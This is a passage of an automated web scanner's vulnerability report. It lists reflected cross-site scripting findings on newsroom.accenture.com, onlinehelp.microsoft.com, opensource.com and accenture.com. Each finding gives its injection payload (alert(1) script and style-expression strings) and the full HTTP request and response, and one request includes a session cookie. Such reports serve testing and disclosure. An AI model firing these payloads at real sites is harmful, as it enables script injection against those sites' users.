Set-Cookie: CFTOKEN=b524ef25b929b76b-6F703AA4-AC75-10FC-30F7881FF520A1A5;expires=Tue, 13-Nov-2040 17:16:55 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:55 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...

/* You may give each page an identifying name, server, and channel on
the next lines. */
s.charSet="ISO-8859-1"
s.pageName="newsroom/article_display.cfm?article_id=5100&c=ogpktl_10000005&n=ilc_1110d19d7</script><a>acbabcf8454"
s.channel="accenture/newsroom/pressreleases"
s.server="http://www.accenture.com"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write
...[SNIP]...

1.118. http://newsroom.accenture.com/article_display.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /article_display.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 458c4</script><a>52134726541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article_display.cfm?article_id=5052&458c4</script><a>52134726541=1 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:35 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120585;expires=Tue, 13-Nov-2040 17:16:35 GMT;path=/
Set-Cookie: CFTOKEN=d1fa5982b84c7a66-6F6FED08-A45D-F5A5-C8FDCF2C84F550B2;expires=Tue, 13-Nov-2040 17:16:35 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:35 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.charSet="ISO-8859-1"
s.pageName="newsroom/article_display.cfm?article_id=5052&458c4</script><a>52134726541=1"
s.channel="accenture/newsroom/pressreleases"
s.server="http://www.accenture.com"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.wri
...[SNIP]...

1.119. http://newsroom.accenture.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 595e2</script><a>14a24e4e77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm?595e2</script><a>14a24e4e77=1 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:41 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120677;expires=Tue, 13-Nov-2040 17:16:41 GMT;path=/
Set-Cookie: CFTOKEN=89da660ce5284372-6F70045D-EBF8-57A0-BF02033B5C5232A5;expires=Tue, 13-Nov-2040 17:16:41 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:41 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.charSet="ISO-8859-1"
s.pageName="newsroom/index.cfm?595e2</script><a>14a24e4e77=1"
s.channel="accenture/newsroom/home"
s.server="http://www.accenture.com"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code
...[SNIP]...

1.120. http://newsroom.accenture.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec10a"><a>31f449be3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?ec10a"><a>31f449be3b9=1 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:23 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120414;expires=Tue, 13-Nov-2040 17:16:23 GMT;path=/
Set-Cookie: CFTOKEN=34fb8bfd8c1ef11e-6F6FBEAD-FF5D-27A0-90D78F19A6897076;expires=Tue, 13-Nov-2040 17:16:23 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:23 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" name="new_path_info" value="/index.cfm?ec10a"><a>31f449be3b9=1">
...[SNIP]...

1.121. http://newsroom.accenture.com/login.cfm [path_info parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.accenture.com
Path:   /login.cfm

Issue detail

The value of the path_info request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74f0a"style%3d"x%3aexpression(alert(1))"137df798c96 was submitted in the path_info parameter. This input was echoed as 74f0a"style="x:expression(alert(1))"137df798c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login.cfm?path_info=%2F404%2Ecfm%3F404%3Bhttp%3A%2F%2Fnewsroom%2Eaccenture%2Ecom%3A80%2Fpr%2Bcontacts%2F74f0a"style%3d"x%3aexpression(alert(1))"137df798c96 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:32 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120557;expires=Tue, 13-Nov-2040 17:16:32 GMT;path=/
Set-Cookie: CFTOKEN=9aded3106d407836-6F6FE240-FD00-0E61-D0D4AFB8729474EE;expires=Tue, 13-Nov-2040 17:16:32 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:32 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" name="new_path_info" value="/404.cfm?404;http://newsroom.accenture.com:80/pr+contacts/74f0a"style="x:expression(alert(1))"137df798c96">
...[SNIP]...

1.122. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a39"><script>alert(1)</script>c3378771fa8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?35a39"><script>alert(1)</script>c3378771fa8=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADxBQAAeDkgSY5AxVbdEUS04pPjkw!!&M=1; domain=.microsoft.com; expires=Wed, 21-Nov-2040 18:08:20 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 21-Nov-2040 18:08:20 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 21 Nov 2010 18:08:20 GMT
Content-Length: 43682


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?35a39"><script>alert(1)</script>c3378771fa8=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.123. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beb2d"-alert(1)-"36f5ca8f95c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /educationbeb2d"-alert(1)-"36f5ca8f95c/10/11/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:05 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=pot4a6kt25c09k94qncm5jc6o4; expires=Tue, 14-Dec-2010 21:42:25 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<!--
s.pageName="opensource|blocks404";
s.server="";
s.channel="opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/educationbeb2d"-alert(1)-"36f5ca8f95c/10/11/three-unspoken-blockers-preventing-open-source-participation";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! *********
...[SNIP]...

1.124. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87f0"-alert(1)-"42d3f0ecc9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /education/10d87f0"-alert(1)-"42d3f0ecc9f/11/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:16 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=1q1ubnusk38f0gl7vmlnq37m64; expires=Tue, 14-Dec-2010 21:42:36 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<!--
s.pageName="opensource|blocks404";
s.server="";
s.channel="opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/education/10d87f0"-alert(1)-"42d3f0ecc9f/11/three-unspoken-blockers-preventing-open-source-participation";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! ************
...[SNIP]...

1.125. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cada1"-alert(1)-"ddab8f1f4c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /education/10/11cada1"-alert(1)-"ddab8f1f4c6/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:24 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=dmbh5vkijghseefsmfk4jgg127; expires=Tue, 14-Dec-2010 21:42:44 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
!--
s.pageName="opensource|blocks404";
s.server="";
s.channel="opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/education/10/11cada1"-alert(1)-"ddab8f1f4c6/three-unspoken-blockers-preventing-open-source-participation";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
...[SNIP]...

1.126. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 118ea"-alert(1)-"e6e7e121cd3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /education/10/11/three-unspoken-blockers-preventing-open-source-participation118ea"-alert(1)-"e6e7e121cd3 HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:32 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=mmrp8cuki6bgac3rvbrkn1bkd2; expires=Tue, 14-Dec-2010 21:42:52 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
="opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation118ea"-alert(1)-"e6e7e121cd3";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
//-->
...[SNIP]...

1.127. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://opensource.com
Path:   /education/10/11/three-unspoken-blockers-preventing-open-source-participation

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f7ca"-alert(1)-"b0c201e8db0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /education/10/11/three-unspoken-blockers-preventing-open-source-participation?9f7ca"-alert(1)-"b0c201e8db0=1 HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 18:08:57 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=4m9kr84ic388b0m1la5a3sabd6; expires=Tue, 14-Dec-2010 21:42:17 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:08:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
"opensource";
s.pageType="";
s.prop1="";
s.campaign="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar23="http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation?9f7ca"-alert(1)-"b0c201e8db0=1";
s.events="";
s.products="";
s.state="";
s.zip="";
s.purchaseID="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
//-->
...[SNIP]...

1.128. http://www.accenture.com/accenture/search/search.aspx [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11cca"><script>alert(1)</script>fc0af4dfab4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture11cca"><script>alert(1)</script>fc0af4dfab4&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:37 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67197


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
n-US&banner=3EFEDDE7-C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture11cca"><script>alert(1)</script>fc0af4dfab4&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchb
...[SNIP]...

1.129. http://www.accenture.com/accenture/search/search.aspx [filter parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the filter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146f3"><script>alert(1)</script>2ce8741c39d was submitted in the filter parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1146f3"><script>alert(1)</script>2ce8741c39d&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:32 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67197


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
er=3EFEDDE7-C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1146f3"><script>alert(1)</script>2ce8741c39d&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.130. http://www.accenture.com/accenture/search/search.aspx [getfields parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the getfields request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 211ce"><script>alert(1)</script>d579d659514 was submitted in the getfields parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*211ce"><script>alert(1)</script>d579d659514&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
